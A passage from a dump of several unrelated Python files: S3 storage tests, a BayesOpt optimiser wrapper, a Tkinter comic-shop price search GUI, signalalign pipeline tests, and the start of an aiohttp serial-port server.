self.assertEqual(len(files), 2)
for filename in ["2.txt", "4.txt"]:
self.assertTrue(filename in files,
""" "%s" not in file list "%s".""" % (
filename, files))
def test_storage_listdir_subdir(self):
file_names = ["some/path/1.txt", "some/2.txt"]
result = []
for p in file_names:
obj = mock.MagicMock()
obj.key = p
result.append(obj)
self.storage.bucket.objects.filter.return_value = iter(result)
dirs, files = self.storage.listdir("some/")
self.storage.bucket.objects.filter.assert_called_with(Prefix="some/")
self.assertEqual(len(dirs), 1)
self.assertTrue('path' in dirs,
""" "path" not in directory list "%s".""" % (dirs,))
self.assertEqual(len(files), 1)
self.assertTrue('2.txt' in files,
""" "2.txt" not in files list "%s".""" % (files,))
def test_storage_size(self):
obj = self.storage.bucket.Object.return_value
obj.content_length = 4098
name = 'file.txt'
self.assertEqual(self.storage.size(name), obj.content_length)
def test_storage_mtime(self):
# Test both USE_TZ cases
for use_tz in (True, False):
with self.settings(USE_TZ=use_tz):
self._test_storage_mtime(use_tz)
def _test_storage_mtime(self, use_tz):
obj = self.storage.bucket.Object.return_value
obj.last_modified = datetime.now(utc)
name = 'file.txt'
self.assertFalse(
is_aware(self.storage.modified_time(name)),
'Naive datetime object expected from modified_time()'
)
self.assertIs(
settings.USE_TZ,
is_aware(self.storage.get_modified_time(name)),
'%s datetime object expected from get_modified_time() when USE_TZ=%s' % (
('Naive', 'Aware')[settings.USE_TZ],
settings.USE_TZ
)
)
def test_storage_url(self):
name = 'test_storage_size.txt'
url = 'http://aws.amazon.com/%s' % name
self.storage.bucket.meta.client.generate_presigned_url.return_value = url
self.storage.bucket.name = 'bucket'
self.assertEqual(self.storage.url(name), url)
self.storage.bucket.meta.client.generate_presigned_url.assert_called_with(
'get_object',
Params={'Bucket': self.storage.bucket.name, 'Key': name},
ExpiresIn=self.storage.querystring_expire
)
custom_expire = 123
self.assertEqual(self.storage.url(name, expire=custom_expire), url)
self.storage.bucket.meta.client.generate_presigned_url.assert_called_with(
'get_object',
Params={'Bucket': self.storage.bucket.name, 'Key': name},
ExpiresIn=custom_expire
)
def test_generated_url_is_encoded(self):
self.storage.custom_domain = "mock.cloudfront.net"
filename = "whacky & filename.mp4"
url = self.storage.url(filename)
parsed_url = urlparse.urlparse(url)
self.assertEqual(parsed_url.path,
"/whacky%20%26%20filename.mp4")
self.assertFalse(self.storage.bucket.meta.client.generate_presigned_url.called)
def test_special_characters(self):
self.storage.custom_domain = "mock.cloudfront.net"
name = "ãlöhâ.jpg"
content = ContentFile('new content')
self.storage.save(name, content)
self.storage.bucket.Object.assert_called_once_with(name)
url = self.storage.url(name)
parsed_url = urlparse.urlparse(url)
self.assertEqual(parsed_url.path, "/%C3%A3l%C3%B6h%C3%A2.jpg")
def test_strip_signing_parameters(self):
expected = 'http://bucket.s3-aws-region.amazonaws.com/foo/bar'
self.assertEqual(self.storage._strip_signing_parameters(
'%s?X-Amz-Date=12345678&X-Amz-Signature=Signature' % expected), expected)
self.assertEqual(self.storage._strip_signing_parameters(
'%s?expires=12345678&signature=Signature' % expected), expected)
@skipIf(threading is None, 'Test requires threading')
def test_connection_threading(self):
connections = []
def thread_storage_connection():
connections.append(self.storage.connection)
for x in range(2):
t = threading.Thread(target=thread_storage_connection)
t.start()
t.join()
# Connection for each thread needs to be unique
self.assertIsNot(connections[0], connections[1])
|
algorithm_bayesopt.py
|
from .problem import Problem
from .algorithm import Algorithm
from .config import artap_root
import time
import numpy as np
import os
import sys
sys.path.append(artap_root + os.sep + "lib" + os.sep)
import bayesopt
from multiprocessing import Process, Pipe, Queue, Manager
# from multiprocessing.managers import BaseManager
_l_type = ['L_FIXED', 'L_EMPIRICAL', 'L_DISCRETE', 'L_MCMC', 'L_ERROR']
_sc_type = ['SC_MTL', 'SC_ML', 'SC_MAP', 'SC_LOOCV', 'SC_ERROR']
_surr_name = ["sGaussianProcess", "sGaussianProcessML", "sGaussianProcessNormal", "sStudentTProcessJef", "sStudentTProcessNIG"]
# Python module to run the BayesOpt library in an OO pattern.
# The objective module should inherit this one and override evaluateSample
# (see the usage sketch after the class below).
class BayesOptContinuous(object):
# Let's define the vector.
#
# For different options: see vector.h and vector.cpp .
# If a parameter is not defined, it will be automatically set
# to a default value.
def __init__(self, n_dim):
## Library vector
self.params = {}
## n dimensions
self.n_dim = n_dim
## Lower bounds
self.lb = np.zeros((self.n_dim,))
## Upper bounds
self.ub = np.ones((self.n_dim,))
@property
def parameters(self):
return self.params
@parameters.setter
def parameters(self, params):
self.params = params
@property
def lower_bound(self):
return self.lb
@lower_bound.setter
def lower_bound(self, lb):
self.lb = lb
@property
def upper_bound(self):
return self.ub
@upper_bound.setter
def upper_bound(self, ub):
self.ub = ub
    ## Function for testing.
    # It should be overridden.
def evaluateSample(self, x_in):
raise NotImplementedError("Please Implement this method")
## Main function. Starts the optimization process.
def optimize(self):
min_val, x_out, error = bayesopt.optimize(self.evaluateSample, self.n_dim,
self.lb, self.ub,
self.params)
return min_val, x_out, error
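# Hypothetical usage sketch (illustrative only; SphereObjective and
# _bayesopt_usage_example are not used elsewhere in this module): subclass
# BayesOptContinuous and override evaluateSample with the scalar objective to
# minimize, then call optimize().
def _bayesopt_usage_example():
    class SphereObjective(BayesOptContinuous):
        def evaluateSample(self, x_in):
            # bayesopt minimizes the returned scalar
            return float(np.sum(np.asarray(x_in) ** 2))

    opt = SphereObjective(n_dim=2)
    opt.parameters = {'n_iterations': 20, 'n_init_samples': 5}
    min_val, x_out, error = opt.optimize()
    return min_val, x_out, error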
class BayesOpt(Algorithm):
""" BayesOpt algorithms """
def __init__(self, problem: Problem, name="BayesOpt"):
super().__init__(problem, name)
self.problem = problem
self.options.declare(name='l_type', default='L_EMPIRICAL', values=_l_type,
desc='Type of learning for the kernel params')
self.options.declare(name='sc_type', default='SC_MAP', values=_sc_type,
                             desc='Score function type for kernel hyperparameter learning')
self.options.declare(name='n_iterations', default=50, lower=1,
desc='Maximum BayesOpt evaluations')
self.options.declare(name='init_method', default=1,
desc='Init method') # 1-LHS, 2-Sobol
self.options.declare(name='n_init_samples', default=10, lower=1,
desc='Number of samples before optimization')
self.options.declare(name='n_iter_relearn', default=10, lower=1,
desc='Number of samples before relearn kernel')
self.options.declare(name='surr_name', default='sGaussianProcessML', values=_surr_name,
desc='Name of the surrogate function')
self.options.declare(name='surr_noise', default=1e-10, lower=0.0,
desc='Variance of observation noise')
class BayesOptClassSerial(BayesOptContinuous):
def __init__(self, algorithm):
n = len(algorithm.problem.parameters)
super().__init__(n)
# algorithm
self.algorithm = algorithm
# Size design variables.
self.lb = np.empty((n,))
self.ub = np.empty((n,))
self.params = {}
def evaluateSample(self, x):
return self.algorithm.evaluator.evaluate_scalar(x)
class BayesOptSerial(BayesOpt):
""" BayesOpt algorithms """
def __init__(self, problem: Problem, name="BayesOpt"):
super().__init__(problem, name)
self.bo = BayesOptClassSerial(self)
def run(self):
# Figure out bounds vectors.
i = 0
for parameter in self.problem.parameters:
bounds = parameter['bounds']
self.bo.lb[i] = bounds[0]
self.bo.ub[i] = bounds[1]
i += 1
# set bayesopt
self.bo.params['n_iterations'] = self.options['n_iterations']
self.bo.params['n_init_samples'] = self.options['n_init_samples']
self.bo.params['n_iter_relearn'] = self.options['n_iter_relearn']
self.bo.params['surr_name'] = self.options['surr_name']
self.bo.params['surr_noise'] = self.options['surr_noise']
self.bo.params['init_method'] = self.options['init_method']
self.bo.params['l_type'] = self.options['l_type']
self.bo.params['sc_type'] = self.options['sc_type']
self.bo.params['verbose_level'] = self.options['verbose_level']
t_s = time.time()
self.problem.logger.info("BayesOpt: surr_name{}".format(self.options['surr_name']))
mvalue, x_out, error = self.bo.optimize()
t = time.time() - t_s
self.problem.logger.info("BayesOpt: elapsed time: {} s".format(t))
        # sync changed individual information
self.problem.data_store.sync_all()
if error != 0:
print('Optimization FAILED.')
print("Error", error)
print('-' * 35)
else:
pass
# print('Optimization Complete, %f seconds' % (clock() - start))
# print("Result", x_out, mvalue)
# print('-' * 35)
class BayesOptClassParallel(Process, BayesOptContinuous):
def __init__(self, pipe, algorithm):
n = len(algorithm.problem.parameters)
Process.__init__(self)
BayesOptContinuous.__init__(self, n)
# algorithm
self.algorithm = algorithm
# output
self.mvalue = -1.0
self.x_out = -1.0
self.error = 0
self.pipe = pipe
# Size design variables.
self.lb = np.empty((n,))
self.ub = np.empty((n,))
self.params = {}
def run(self):
mvalue, x_out, error = self.optimize()
self.pipe.send('STOP')
# set output values
self.mvalue = mvalue
self.x_out = x_out
self.error = error
# output
print("output")
print(self.mvalue)
print(self.x_out)
print(self.error)
def evaluateSample(self, x):
self.pipe.send(x)
result = self.pipe.recv()
return result
class BayesOptParallel(BayesOpt):
""" BayesOpt algorithms """
def __init__(self, problem: Problem, name="BayesOpt"):
super().__init__(problem, name)
self.pipe_par, self.pipe_child = Pipe()
self.bo = BayesOptClassParallel(self.pipe_child, self)
def worker(self, pipe):
x = None
while True:
x = pipe.recv()
if str(x) == 'STOP':
break
            result = self.evaluator.evaluate_scalar(x)  # evaluate via the algorithm's evaluator, as in the serial variant
pipe.send(result)
def run(self):
# Figure out bounds vectors.
i = 0
for parameter in self.problem.parameters:
bounds = parameter['bounds']
self.bo.lb[i] = bounds[0]
self.bo.ub[i] = bounds[1]
i += 1
# set bayesopt
self.bo.params['n_iterations'] = self.options['n_iterations']
self.bo.params['n_init_samples'] = self.options['n_init_samples']
self.bo.params['n_iter_relearn'] = self.options['n_iter_relearn']
self.bo.params['surr_name'] = self.options['surr_name']
self.bo.params['surr_noise'] = self.options['surr_noise']
self.bo.params['init_method'] = self.options['init_method']
self.bo.params['l_type'] = self.options['l_type']
self.bo.params['sc_type'] = self.options['sc_type']
self.bo.params['verbose_level'] = self.options['verbose_level']
# process = Process(target=self.worker, args=(self.pipe_par, self.problem, ))
process = Process(target=self.worker, args=(self.pipe_par, ))
self.bo.start()
process.start()
self.bo.join()
process.join()
print(self.bo.mvalue)
print(self.bo.x_out)
print(self.bo.error)
print()
print(self.problem.data_store, len(self.problem.populations[-1].individuals))
# self.result = self.mvalue
"""
if self.bo.error != 0:
print('Optimization FAILED.')
print("Error", self.bo.error)
print('-' * 35)
else:
print('Optimization Complete, %f seconds' % (clock() - start))
print("Result", self.bo.x_out, self.bo.mvalue)
print('-' * 35)
"""
|
oz_cs_gui.py
|
"""
GUI Version of Oz_comic_search
SCRIPT TO SEARCH ALL AUSTRALIAN COMIC BOOK SHOPS with online stores
Simply input search terms and get Title | Price | Link for all shops
"""
from tkinter import * # FOR GUI
from tkinter import ttk
from PIL import ImageTk,Image
#MULTITHREADING
from threading import Thread
#ALL SEARCH FUNCTIONS
from src.comicsetc import comic_etc_search
from src.secrethq import secrethq_search
from src.incognito import incognito_search
from src.allstar import allstar_search
from src.impact import impact_search
from src.bookdepository import bookdepository_search
from src.amazon import amazon_search
from src.booktopia import booktopia_search
from src.comicsrus import comicsrus_search
from src.popcultcha import pop_cultcha_search
from src.macs import macs_search
from src.area52 import area_search
from src.minotaur import minotaur_search
from src.greenlight import greenlight_search
#FILTERING
from src.filtering import filtering_results
#MISC
from sys import exit
from pandas import DataFrame
from webbrowser import open as open_url  # avoid shadowing the builtin open()
from sys import platform
# GLOBAL THAT WILL HOLD THE FINAL filtering_results
final_result = []
##### DEFINE MAIN ######
def main():
global final_result
# COLLECTION OF SEARCHED
not_evil_search = [comic_etc_search, secrethq_search, incognito_search, \
allstar_search, impact_search, comicsrus_search, pop_cultcha_search, \
macs_search, area_search, minotaur_search, greenlight_search]
evil_search = [comic_etc_search, secrethq_search, incognito_search, \
allstar_search, impact_search, comicsrus_search, pop_cultcha_search, \
macs_search, area_search, minotaur_search, greenlight_search, \
bookdepository_search, booktopia_search, amazon_search]
############## START PROCESS OPTIONS ################
# CONTEXT MENU
def make_textmenu(root):
global the_menu
the_menu = Menu(root, tearoff=0)
the_menu.add_command(label="Cut")
the_menu.add_command(label="Copy")
the_menu.add_command(label="Paste")
the_menu.add_separator()
the_menu.add_command(label="Select all")
def callback_select_all(event):
# select text after 50ms
root.after(50, lambda:event.widget.select_range(0, 'end'))
def show_textmenu(event):
e_widget = event.widget
the_menu.entryconfigure("Cut",command=lambda: e_widget.event_generate("<<Cut>>"))
the_menu.entryconfigure("Copy",command=lambda: e_widget.event_generate("<<Copy>>"))
the_menu.entryconfigure("Paste",command=lambda: e_widget.event_generate("<<Paste>>"))
the_menu.entryconfigure("Select all",command=lambda: e_widget.select_range(0, 'end'))
the_menu.tk.call("tk_popup", the_menu, event.x_root, event.y_root)
def launch_threaded(func):
global final_result
Thread(target = func, daemon=True).start()
def open_link(a):
curItem = result_field.focus()
try:
url_to_open = result_field.item(curItem)["values"][1]
print(url_to_open)
            open_url(url_to_open)
except IndexError:
pass
def click_search(event=None):
global final_result
# CHECK IF ISSUE/VOL IS NUMERIC
try:
volume_argument = int(vol_selector.get()) # THERE IS A VOLUME AND IT IS A NUMBER
except ValueError:
if vol_selector.get() == "": # THERE IS NOTHING IN THE BOX:
volume_argument = 0
else: # THERE IS TEXT IN THERE
status_label_text.set("Volume / Issue MUST be a number")
status_label.config(text=status_label_text.get())
return # STOP HERE
if search_term.get() == "": # IF NOTHING IN SEARCH BAR
return
final_result = [] # RESET EVERY NEW SEARCH
#DEACTIVATE EVERYTHING
search_bar["state"] = DISABLED
search_button["state"] = DISABLED
type_listbox["state"] = DISABLED
volume_entry["state"] = DISABLED
evil_checkbutton["state"] = DISABLED
status_label_text.set("LOOKING FOR COMICS")
status_label.config(text=status_label_text.get())
# GET ALL PARAMETERS
#search_term.set("old man hawkeye")
search_term_argument = search_term.get()
type_argument = type_selector.get()
evil_argument = evil_selector.get()
# PROCESS ARGUMENTS:
if volume_argument == 0:
volume_argument = None
if type_argument == "":
type_argument = None
print("ARGUMENTS ARE : {} | {} | {} | {}".format(search_term_argument,type_argument, volume_argument, evil_argument))
        if evil_argument:
list_of_shops = evil_search
else:
list_of_shops = not_evil_search
final_result_holder = []
thread_list = []
# MULTITHREADING ?
def threaded_search(shop_search_function, search_term, result_holder):
final_result_holder.append(shop_search_function(search_term))
for shop_function_search in list_of_shops:
#print(shop_function_search)
#print("Creating Threads")
#print(search_term_argument)
t = Thread(target=threaded_search, args=(shop_function_search,search_term_argument,final_result_holder))
thread_list.append(t)
#print(thread_list)
#print(len(thread_list))
for search_thread in thread_list:
print("Starting_thread {}".format(search_thread))
search_thread.start()
for search_thread in thread_list:
print("WAIT FOR FINISH {}".format(search_thread))
search_thread.join()
final_result = [item for sublist in final_result_holder for item in sublist if sublist != []]
if volume_argument or type_argument:
final_result = filtering_results(final_result, type_argument, volume_argument)
# REORDER
final_result = sorted(final_result, key=lambda k: k['price'])
### PRINT RESULTS ####
print_df = DataFrame.from_dict(final_result)
print(print_df)
# TRY Treeview
#delete previous Treeview
result_field.delete(*result_field.get_children())
for i in range(len(print_df.index.values)):
result_field.insert('','end',value=tuple(print_df.iloc[i].values))
# columns = ["title", "url", "price", "shop", "availability"]
result_field.column("title",width=200,anchor='center')
result_field.column("url",width=100, anchor="center")
result_field.column("price",width=150, anchor="center")
result_field.column("shop",width=150, anchor="center")
result_field.column("availability",width=150, anchor="center")
result_field.heading("title",text="Title")
result_field.heading("url",text="URL")
result_field.heading("price",text="Price")
result_field.heading("shop",text="Shop")
result_field.heading("availability",text="Availability")
vsb = ttk.Scrollbar(root, orient="vertical", command=result_field.yview)
result_field.configure(yscrollcommand=vsb.set)
vsb.grid(column=7, row = 1, rowspan = 20, sticky=E+S+N)
result_field.bind('<Double-Button-1>', open_link)
        # REACTIVATE EVERYTHING
search_bar["state"] = NORMAL
search_button["state"] = NORMAL
type_listbox["state"] = "readonly"
volume_entry["state"] = NORMAL
evil_checkbutton["state"] = NORMAL
status_label_text.set("DONE")
status_label.config(text=status_label_text.get())
############## END PROCESSING OPTIONS################
# COLOR SETUP
bg_left = "light grey"
    bg_right = "black"
# SETUP BASICS FOR GUI
root = Tk() # ROOT IS TOP LEVEL WINDOW
root.configure(background=bg_left)
root.title("Oz Comics Search") # TITLE OF THE WINDOW
root.minsize(600,300)
    # TODO: ADD ICON THAT WORKS
try:
root.iconbitmap( './pic/icon.ico')
except TclError:
pass
#root.geometry("1080x600") # SIZE AT STARTUP
make_textmenu(root)
    # bind the feature to all Entry widgets
if platform == "darwin":
root.bind_class("Entry", "<Button-2><ButtonRelease-2>", show_textmenu)
root.bind_class("Entry", "<Control-a>", callback_select_all)
else:
root.bind_class("Entry", "<Button-3><ButtonRelease-3>", show_textmenu)
root.bind_class("Entry", "<Control-a>", callback_select_all)
# LEFT PANEL
############## START LEFT OPTIONS ################
#creates a frame that is a child of object named 'root'
left_frame = Frame(master=root, bg=bg_left, relief = "raised")
left_frame.grid(row = 1, column = 1)
##### SETUP ALL VARIABLES #####
type_selector = StringVar() # STORE VALUE OF TYPE SELECTION
vol_selector = StringVar() # STORE VALUE OF VOLUME SELECTION
evil_selector = BooleanVar() # STORE VALUE OF EVIL ON/OFF
search_term = StringVar() #IS THE ACTUAL SEARCH TERM
# LOGO ROW = 1
try:
canvas = Canvas(left_frame, width = 300, height = 100, bg = bg_left)
canvas.grid(row=1, column=1, columnspan=2)
img = PhotoImage(file="./pic/logo.png")
canvas.create_image(0,0, anchor=NW, image=img)
except TclError:
canvas.create_text(150,50,text = "Oz Comics Search", justify = CENTER, font = 'Helvetica 24')
# LABEL ROW = 2
search_label = Label(left_frame, text="Search for trade, issue, graphic novels...", bg = bg_left)
search_label.grid(row = 2, column = 1)
# SEARCH ROW = 3
search_row = 3
# SEARCH BAR: ENTRY
search_bar = Entry(left_frame, textvariable = search_term)
search_bar.grid(row=search_row,column=1, padx = 0, columnspan=2, sticky = W+E)
# SEARCH BUTTON: BUTTON
search_button = Button(left_frame, text = "Search", bg = bg_left, command = lambda: launch_threaded(click_search))
search_button.grid(row=search_row+1,column=1,columnspan=2)
# OPTION LABEL ROW = 5
option_row = 5
type_label = Label(left_frame, text= "Choose Book Type", bg = bg_left)
type_label.grid(row=option_row,column=1)
volume_label = Label(left_frame, text= "Volume / Issue #", bg = bg_left)
volume_label.grid(row=option_row,column=2)
# OPTION ROW = 6
option_row = 6
#TYPE SELECTOR = COMBOBOX
type_selector = StringVar()
type_list = ["", "trade", "issue"]
type_listbox = ttk.Combobox(left_frame, cursor = "hand2", justify = CENTER, textvariable=type_selector, state="readonly")
type_listbox['values'] = type_list
type_listbox.grid(row = option_row, column = 1)
# VOLUME SELECTOR = Entry
volume_entry = Entry(left_frame, textvariable = vol_selector)
volume_entry.grid(row=option_row,column=2)
# Check Button evil mode
check_evil_row = 7
evil_checkbutton = Checkbutton(left_frame, bg = bg_left, variable = evil_selector, onvalue = True, offvalue = False)
evil_checkbutton.grid(row = check_evil_row, column = 1, sticky = E)
evil_label = Label(left_frame, text="Include Amazon AU, Bookdepository, Booktopia", bg = bg_left)
evil_label.grid(row = check_evil_row, column = 2)
# STATUS LABEL
status_label_text = StringVar()
status_label = Label(left_frame, text = status_label_text.get(), bg = bg_left)
status_label.grid(row = check_evil_row + 1, column=1, columnspan=2)
############## END LEFT OPTIONS ################
search_bar.bind('<Return>', lambda event, func = click_search: launch_threaded(func))
############## START RIGHT RESULTS ################
#creates a frame that is a child of object named 'root'
    #right_frame = Frame(master=root, bg=bg_right, relief = "raised")
#right_frame.grid(column = 3, row = 1, columnspan=4, rowspan=15, sticky=W+E+N+S)
columns = ["title", "url", "price", "shop", "availability"]
result_field = ttk.Treeview(master=root,show="headings", columns=columns)
result_field.grid(column = 3, row = 1, columnspan=1, rowspan = 5 ,sticky=W+E+S+N)
root.columnconfigure(3,weight=1)
root.rowconfigure(5,weight=1)
############## END RIGHT RESULTS ################
###### RUN ######
root.mainloop()
if __name__ == '__main__':
main()
|
test_build_alignments.py
|
#!/usr/bin/env python
"""Test trainModels.py"""
########################################################################
# File: test_build_alignments.py
# executable: test_build_alignments.py
#
# Author: Andrew Bailey
# History: 5/21/18 Created
########################################################################
import unittest
import tempfile
import numpy as np
from signalalign.build_alignments import *
from signalalign.train.trainModels import get_kmers, multiprocess_make_kmer_assignment_tables
from py3helpers.utils import time_it, count_lines_in_file, captured_output
from embed import bindings
class TrainSignalAlignTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
super(TrainSignalAlignTest, cls).setUpClass()
cls.HOME = '/'.join(os.path.abspath(__file__).split("/")[:-4])
cls.reference = os.path.join(cls.HOME, "tests/test_sequences/pUC19_SspI_Zymo.fa")
cls.ecoli_reference = os.path.join(cls.HOME, "tests/test_sequences/E.coli_K12.fasta")
cls.ecoli_bam = os.path.join(cls.HOME, "tests/minion_test_reads/canonical_ecoli_R9/canonical_ecoli.bam")
cls.ecoli_readdb = os.path.join(cls.HOME, "tests/minion_test_reads/canonical_ecoli_R9/canonical_ecoli.readdb")
cls.fast5_dir = os.path.join(cls.HOME, "tests/minion_test_reads/canonical_ecoli_R9")
cls.files = [
"miten_PC_20160820_FNFAD20259_MN17223_mux_scan_AMS_158_R9_WGA_Ecoli_08_20_16_83098_ch138_read23_"
"strand.fast5",
"miten_PC_20160820_FNFAD20259_MN17223_sequencing_run_AMS_158_R9_WGA_Ecoli_08_20_16_43623_ch101_"
"read456_strand.fast5",
"miten_PC_20160820_FNFAD20259_MN17223_sequencing_run_AMS_158_R9_WGA_Ecoli_08_20_16_43623_ch101_"
"read544_strand1.fast5",
"miten_PC_20160820_FNFAD20259_MN17223_sequencing_run_AMS_158_R9_WGA_Ecoli_08_20_16_43623_ch103_"
"read333_strand1.fast5"]
cls.fast5_paths = [os.path.join(cls.fast5_dir, f) for f in os.listdir(cls.fast5_dir)
if os.path.isfile(os.path.join(cls.fast5_dir, f))]
cls.alignments_dir = os.path.join(cls.HOME, "tests/test_alignments/pUC_6mer_tempFiles_alignment")
cls.alignments_path = os.path.join(cls.HOME,
"tests/test_alignments/pUC_6mer_tempFiles_alignment/"
"07b1cae8-9b48-426f-a2a5-b07437d5a58e.sm.backward.tsv")
cls.assignment_path = os.path.join(cls.HOME,
"tests/test_assignment_files/"
"d6160b0b-a35e-43b5-947f-adaa1abade28.sm.assignments.tsv")
def test_add_to_queue(self):
with captured_output() as (_, _):
work_queue = Manager().Queue()
worker_count = 2
for w in range(worker_count):
p = Process(target=add_to_queue, args=(work_queue,), daemon=True)
p.start()
data = get_from_queue(work_queue, worker_count)
# print(data)
self.assertSequenceEqual(sorted(list(range(10)) + list(range(10))), sorted(data))
def test_alignment_file_to_queues(self):
with captured_output() as (_, _):
max_size = 10
work_queues = [Manager().Queue(max_size) for _ in range(2)]
alignment_file_to_queues(self.alignments_path, work_queues, min_prob=0.9)
first_one = work_queues[0].get()
self.assertSequenceEqual(first_one, ["TGAAAA", "t", 75.375476, 0.999576])
def test_assignment_file_to_queues(self):
with captured_output() as (_, _):
max_size = 10
work_queues = [Manager().Queue(max_size) for _ in range(2)]
assignment_file_to_queues(self.assignment_path, work_queues, min_prob=0.9)
first_one = work_queues[0].get()
self.assertSequenceEqual(first_one, ["GCCTTA", "t", 83.709275, 1.000000])
def test_get_nlargest_queue(self):
with captured_output() as (_, _):
work_queue = Manager().Queue()
all_data = []
for x in np.random.randint(100, size=100):
work_queue.put(x)
all_data.append(x)
data = get_nlargest_queue(work_queue, topn=100)
self.assertSequenceEqual(data, sorted(all_data)[::-1])
def test_get_nlargest_alignment_queue(self):
with captured_output() as (_, _):
work_queue = Manager().Queue()
all_data = []
for x in np.random.randint(100, size=100):
data = ["GCCTTA", "t", "83.709275", x]
work_queue.put(data)
all_data.append(data)
data = get_nlargest_alignment_queue(work_queue, topn=100)
self.assertSequenceEqual(data, sorted(all_data)[::-1])
def test_make_kmer_directories(self):
with captured_output() as (_, _):
with tempfile.TemporaryDirectory() as temdir:
dirs = make_kmer_directories(temdir, "ACGT", 6, complement=False)
for new_dir in dirs:
self.assertTrue(os.path.isdir(new_dir))
def test_split_assignment_file(self):
with captured_output() as (_, _):
with tempfile.TemporaryDirectory() as temdir:
dirs = make_kmer_directories(temdir, "ACGT", 6, complement=False)
split_assignment_file(self.assignment_path, dirs, "ACGT", 6, 4, min_prob=0.0)
self.assertTrue(
os.path.exists(os.path.join(os.path.join(temdir, "GCCTTA"), os.path.basename(self.assignment_path))))
with tempfile.TemporaryDirectory() as temdir:
dirs = make_kmer_directories(temdir, "ACGT", 6, complement=False)
split_assignment_file(self.alignments_path, dirs, "ACGT", 6, 4, min_prob=0.0, alignment=True)
self.assertTrue(
os.path.exists(os.path.join(os.path.join(temdir, "TGAAAA"), os.path.basename(self.alignments_path))))
def test_multiprocess_split_assignment_file(self):
with captured_output() as (_, _):
with tempfile.TemporaryDirectory() as temdir:
dirs = make_kmer_directories(temdir, "ACGT", 6, complement=False)
multiprocess_split_sa_tsv_file([self.assignment_path], dirs, "ACGT", 6, min_prob=0.0, worker_count=1)
self.assertTrue(os.path.exists(os.path.join(os.path.join(temdir, "GCCTTA"),
os.path.basename(self.assignment_path))))
with tempfile.TemporaryDirectory() as temdir:
dirs = make_kmer_directories(temdir, "ACGT", 6, complement=True)
multiprocess_split_sa_tsv_file([self.alignments_path], dirs, "ACGT", 6, min_prob=0.0,
worker_count=1, alignment=True)
self.assertTrue(
os.path.exists(os.path.join(os.path.join(temdir, "TGAAAA"),
os.path.basename(self.alignments_path))))
def test_get_top_kmers_from_directory(self):
with captured_output() as (_, _):
with tempfile.TemporaryDirectory() as temdir:
dirs = make_kmer_directories(temdir, "ACGT", 6, complement=False)
split_assignment_file(self.assignment_path, dirs, "ACGT", 6, 4, min_prob=0.0)
get_top_kmers_from_directory(dirs[2428], temdir, 10, random=False)
data = []
with open(os.path.join(temdir, "GCCTTA.tsv"), "r") as fh:
line = fh.readline()
data.append(line.split()[3])
self.assertSequenceEqual(sorted(data)[::-1], data)
def test_multiprocess_get_top_kmers_from_directory(self):
with captured_output() as (_, _):
with tempfile.TemporaryDirectory() as temdir:
dirs = make_kmer_directories(temdir, "ACGT", 6, complement=False)
split_assignment_file(self.assignment_path, dirs, "ACGT", 6, 4, min_prob=0.0)
multiprocess_get_top_kmers_from_directory(dirs, temdir, 10, random=False)
data = []
with open(os.path.join(temdir, "GCCTTA.tsv"), "r") as fh:
line = fh.readline()
data.append(line.split()[3])
self.assertSequenceEqual(sorted(data)[::-1], data)
def test_generate_top_n_kmers_from_sa_output(self):
with captured_output() as (_, _):
with tempfile.TemporaryDirectory() as temdir:
output_file = os.path.join(temdir, "built_alignment.tsv")
generate_top_n_kmers_from_sa_output([self.alignments_path], temdir, output_file, 10,
kmer_len=6, min_prob=0.8, worker_count=1, random=False)
def test_generate_buildAlignments4(self):
with captured_output() as (_, _):
kmers = get_kmers(6, alphabet="ATGC")
data_files = [self.alignments_path]
data, time1 = time_it(multiprocess_make_kmer_assignment_tables,
data_files, kmers,
{"t", "c"}, 0.0, True, True, 10, 2)
with tempfile.TemporaryDirectory() as temdir:
output_file = os.path.join(temdir, "built_alignment.tsv")
data2, time2 = time_it(generate_top_n_kmers_from_sa_output,
data_files, temdir, output_file, 10, "ACGT", 6, 0.0, 8, False, True, False, True)
# get kmers associated with each sample
num_lines = len(list(open(output_file)))
self.assertEqual(len(data.index), num_lines)
self.assertLess(time2, time1)
def test_generate_buildAlignments5(self):
with captured_output() as (_, _):
data_files = [self.assignment_path]
data, time1 = time_it(multiprocess_make_kmer_assignment_tables,
data_files, get_kmers(6, alphabet="ATGC"),
{"t", "c"}, 0.5, True, False, 10, 2)
# get kmers associated with each sample
lines = len(data.index)
with tempfile.TemporaryDirectory() as temdir:
out_path = os.path.join(temdir, "test.tsv")
log_path = os.path.join(temdir, "log.tsv")
data2, time2 = time_it(bindings.generate_master_kmer_table,
[self.assignment_path], out_path, log_path, 10, "ACGT", 0.5, 2, False)
# get kmers associated with each sample
lines2 = count_lines_in_file(out_path)
self.assertLess(time2, time1)
self.assertEqual(lines, lines2)
if __name__ == '__main__':
unittest.main()
|
main.py
|
#!/usr/bin/env python3
import logging, os, sys, asyncio, cv2, aiojobs, aiofiles, json, threading, dotenv, argparse, random
import aiohttp, aiohttp_session, time, serial, serial_asyncio, binascii
from aiohttp import web, MultipartWriter
from queue import Queue
from aiohttp.web import middleware
#from objbrowser import browse
from aiojobs.aiohttp import setup, spawn
from concurrent.futures import ThreadPoolExecutor,ProcessPoolExecutor
from functools import wraps
# logging.basicConfig(format="[%(asctime)s] p%(process)s {%(pathname)s:%(lineno)d} %(levelname)s - %(message)s")
# logger = logging.getLogger('async')
# logger.setLevel(logging.DEBUG)
logging.basicConfig(filename="firefly.log",filemode='w',level=logging.DEBUG)
#logging.basicConfig(level=getattr(logging, args.log))
INDEX_File=os.path.join(os.path.dirname(__file__), 'index.html'); logging.debug(INDEX_File)
LOGIN_File=os.path.join(os.path.dirname(__file__), 'login.html'); logging.debug(LOGIN_File)
STATIC_DIR=os.path.join(os.path.dirname(__file__), 'static');logging.debug(STATIC_DIR)
PORT='COM7'#'/dev/ttyS0'
GlobalAPP = _reader = _writer = comPort = None
WSID = 0  # incrementing id assigned to WSClient instances
BAUDRATE=57600
IsAucheticated = False
VERBOSE_DEBUG = False
DEFAULT_LOG_LEVEL = "INFO"
DEFAULT_DELAY = 0.01
DEFAULT_STORAGE = "./photos"
ALLOWED_LOG_LEVELS = (
"CRITICAL",
"FATAL",
"ERROR",
"WARNING",
"WARN",
"INFO",
"DEBUG",
"NOTSET",
)
def thread_decorator(func):
@wraps(func)
def thred_maker(*args,**kwargs):
t=threading.Thread(target=func,args=args,kwargs=kwargs)
t.start()
return t
return thred_maker
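# Hypothetical usage (not used in this file): a function wrapped with
# @thread_decorator runs in its own thread when called and returns that Thread:
#
#     @thread_decorator
#     def poll_sensor(interval):
#         ...
#
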